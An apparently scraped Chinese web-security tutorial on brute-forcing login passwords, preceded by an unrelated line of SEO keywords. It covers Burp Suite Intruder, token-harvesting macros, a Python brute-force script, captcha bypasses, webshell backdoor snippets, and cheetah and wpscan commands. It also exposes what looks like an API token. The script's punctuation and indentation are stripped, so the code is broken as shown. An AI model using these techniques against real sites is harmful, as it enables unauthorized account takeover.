济南便宜网站设计,网络推广及网站建设合作协议,h5网站,广州网站设计公司vi设计公司Web安全 一、概述二、常见的服务1、burpsuite 穷举后台密码2、burpsuite 对 webshell 穷举破解密码3、有 token 防御的网站后台穷举破解密码3.1 burpsuite 设置宏获取 token 对网站后台密码破解3.2 编写脚本获取token 对网站后台密码破解 4、针对有验证码后台的穷举方法4.1 coo… Web安全 一、概述二、常见的服务1、burpsuite 穷举后台密码2、burpsuite 对 webshell 穷举破解密码3、有 token 防御的网站后台穷举破解密码3.1 burpsuite 设置宏获取 token 对网站后台密码破解3.2 编写脚本获取token 对网站后台密码破解 4、针对有验证码后台的穷举方法4.1 cookie 不存在不验证绕过4.2 后台登录验证码没销毁进行穷举4.3 网站后台验证码识别穷举密码 5、phpmyadmin 密码穷举6、一句话木马后门破解7、cheetah 对一句后门密码穷举8、wordpress 博客系统用户密码穷举 一、概述
穷举就是枚举的意思在互联网的今天需要使用某种的服务大多数都需要口令登录这个口令就是密码密码的强度分为弱口令 、中度口令、强度口令。如果登录的服务为弱口令那会存在很大的安全隐患黑客通过穷举弱口令对服务进行攻击很容易就得到登录密码。得到密码之后就能登录服务进行其他危害较大得操作。黑客也能通过对用户得信息整理组合密码进行穷举攻击。例如根据用户的生日号码出身年月日和姓名进行口令组合再对其服务进行穷举。
二、常见的服务
服务端口web80mysql3306Microsoft SQL Server1433https443ftp21ssh22dns53tomcat8080redis6379rsync873PostgreSQL5432cobaltstrike teamserver50050smtp25pop3110远程终端 rdp3389smb445rpc135imap143NetBIOS139SMTPS465POP3S995mogodb27018memcached11211telnet23oracle1521
1、burpsuite 穷举后台密码
brupsuite 是一个安全测试套件 提供了众多的测试功能。在火狐安装插件 FoxyProxy 填写 127.0.0.1 8080 保存为 burp 开启代理。 截取包之后发送到 intruder 在密码设置变量 选择 payloads 选择要穷举的字典 设置攻击后 根据返回的状态码 status 或者 length 网页长度对其进行判断。这里得到正确得密码是 123456 根据状态码 一般测试正确的是现实 302 状态码 另外就是响应网页的长度
2、burpsuite 对 webshell 穷举破解密码
灰帽子对网站攻破后一般会留后门方便对其网站进行非法管理。后门的程序语音包括 asp php .net 这些脚本文件放在网站目录 一般都采用单密码进行登录。通过扫描获取 webshell 的后门的网址。得到网址后可以对其进行密码穷举。
1、burpsuite 截取数据包 2、发送到 intruder 模块 3、选择字典 最后得到密码是!#sec
3、有 token 防御的网站后台穷举破解密码
有的网站后台存在 token 值这个 token 通俗的名字叫令牌每次刷新页面都会随机变化。提交请求时必须携带这个 token 值可以利用这点避免后台进行直接穷举和防止 csrf 攻击。
3.1 burpsuite 设置宏获取 token 对网站后台密码破解
打开 burpsuite 刷新页面 接着 forward 放行这个数据包 来到 Project options -- Session-- add 添加宏 选择 Run a macro
点击之后选择网页历史选择提交之后有 token 的页面。 添加宏
设置 configure item add 添加规则
选择 value 的值 Parameter name 填写 user_token 这个值一定要相同 这样宏就设置成功了。接着穷举测试 抓包 设置变量 添加密码字典。
开始攻击 可以看到每次的 token 值都不一样 、 密码是 password
3.2 编写脚本获取token 对网站后台密码破解
就上面的登录页面来说。
每次访问页面这个 user_token 都会变化导致不能重复提交。 验证原理每次页面生成user_token 存在seesion 里面每次登录用session 里取出来然后验证如果验证成功 就进行密码匹配。如果验证不成功就输出 csrf 错误。
脚本源码
#coding:utf-8
import requests
import reurl http://www.c3moon.com/login.phpdef login(password):session requests.session()reqsession.get(url)user_tokenre.search([a-z0-9]{32},req.text).group(0) #32md5data{username:admin,password:password,Login:Login,user_token:user_token}reqsession.post(urlurl,datadata,allow_redirectsTrue)html req.textreturn htmlwith open(top1000.txt) as p:passlist p.readlines()p.close()for line in passlist:line line.strip(\n)print(line)if File Upload in login(line):print( [* 密码 is %s *] % line )break密码破解成功
4、针对有验证码后台的穷举方法
网站后台或者有登录的地方都可能存在验证码验证验证码的作用 不少网站为了防止用户利用机器人自动注册、登录、灌水都会采用验证码技术所谓的验证码就是将一串随机产生的数字和符号生成一幅图片在图像上加上干扰像素防止 orc要用户用肉眼识别其中的验证码信息输入表单提交网站验证。验证后使用网站某个功能.但是如果验证码逻辑编写不好会存在被绕过的风险。
4.1 cookie 不存在不验证绕过
有些网站如果网站不存在 cookie 就不会验证 验证码 这里cookie即与这里相对应 这里即可以看到发下的验证码GUTF。 这里先对比验证码再对比账号密码我们这里再次发送 这里我们回到虚拟机查看验证码 可以看到这里验证码没有肯定验证不成功。 这里我们将验证码删掉可以看到依然是验证码失效的状态。 下面我们进行删除 PHPSESSION 信息 验证码就不进行验证了。 接着对密码进行穷举 破解密码成功登录后台。
4.2 后台登录验证码没销毁进行穷举
在登录提交的时候进行验证码验证 不管密码是否正确都要销毁验证码。不然验证码可复用确定的验证码
错误的验证码 导入字典进行提交
4.3 网站后台验证码识别穷举密码
验证码干扰像素太少很容易就会被一些工具识别出来。如图片提取文字工具。 登录框存在验证码 这个验证码可被识别的情况下 就会被穷举密码。 将 burpsuite 的包放进验证码识别工具 设置字典和验证码参数 接着选择爆破栏 选择错误的验证码关键词 设置线程 点击 start 即可 可以选择再次爆破 验证准确率会提高。 最后查看响应长度 获取正确的密码。
5、phpmyadmin 密码穷举
phpmyadmin 是 mysql 的一个 web 管理工具可以通过这个工具穷举 mysql 用户的账号和密码。
6、一句话木马后门破解
一句话后门可以使用 burpsuite 通用穷举方法穷举密码。 抓包 将 cmd 设置成变量 添加字典即可 关键字
asp
qweasd123execute(response.clear:response.write(passwordright):response.end)
php
echo password right;
aspx qweasd123Response.Write(moonsec); 密码是 qweasd1237、cheetah 对一句后门密码穷举
cheetah 是针对一句话后门的穷举工具
python cheetah.py -u http://orz/orz.php
python cheetah.py -u http://orz/orz.jsp -r post -n 1000 -v
python cheetah.py -u http://orz/orz.asp -r get -c -p data/pwd.list
python cheetah.py -u http://orz/orz -w aspx -s iis -n 1000
python cheetah.py -b url.list -c -p pwd1.list pwd2.list -v
cheetah.py -u http://www.c1moon.com/a.php -n 1000 -v -p data/pwd.list
cheetah.py -u http://www.c1moon.com/a.asp -n 1000 -v -p data/pwd.list
cheetah.py -u http://www.c1moon.com/a.aspx -n 1000 -v -p data/pwd.list支持 asp php .net jsp 后门
-u 后门地址
-r 提交的方法 一般是 post
-n 一次提交密码的数量
-v 详细信息
-p 字典位置例子python cheetah.py -u http://www.c1moon.com/cmd.php -r post -n 1000 -v8、wordpress 博客系统用户密码穷举
wordpress 是知名的博客系统在互联网上的占有量很大所以一定要知道这套系统的弱口令穷举的方法。 https://wpscan.com 首先到这个网站注册账号和密码注册后获取 token
自动找账号信息 然后登录穷举
wpscan --url http://www.redteam.com/ -e u -P /home/kali/top100password.txt --api-token QYbHH6fbNDIi6Op3MQuvg85fD4fhNiB4RKJsVOMVp6w手动收集 wordpress 用户信息 访问连接获取用户信息 http://www.vtmoon1.com/wp-json/wp/v2/users
获取信息可以再进行指定用户爆破
wpscan --url http://www.vtmoon1.com -U moonsec -P /home/kali/top1000.txt
